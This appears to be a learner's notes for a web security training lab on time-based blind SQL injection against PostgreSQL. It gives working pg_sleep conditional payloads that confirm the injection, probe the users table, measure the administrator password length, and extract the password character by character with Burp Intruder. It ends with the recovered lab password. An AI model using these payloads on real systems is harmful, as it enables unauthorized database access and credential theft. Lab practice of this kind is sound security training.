Subject
Lab: Blind SQL injection with time delays and information retrieval
Url: portswigger.net/web-securit…
Mind Palace
Confirm that time-based blind injection is possible (the first payload should delay the response by about 3 s, the second should not):
';select case when (1=1) then pg_sleep(3) else pg_sleep(0) end--
';select case when (1=2) then pg_sleep(3) else pg_sleep(0) end--
# ==> URL-encode the payload before use (; -> %3b), otherwise the ';' is not delivered intact
Confirm that the users table has a username column and that an administrator account exists:
';select case when (username='administrator') then pg_sleep(10) else pg_sleep(0) end from users--
Use Burp Intruder to find the password length (mark the number after > as the payload position and step it up; the length is the first value for which the delay disappears):
';select case when (username='administrator' and length(password)>3) then pg_sleep(10) else pg_sleep(0) end from users--
Time-based blind extraction, one character at a time:
# core payload (the response is slow only when the guessed character is right)
';select case when (substring(password,1,1)='a') then pg_sleep(10) else pg_sleep(0) end from users where username='administrator'--
Then run Burp Intruder in cluster bomb mode, with the position inside substring() as the first payload set and the candidate character as the second, and look for the slow responses
==> ordering the hits by position gives password = hpolhe7xsrnp25ftjvqj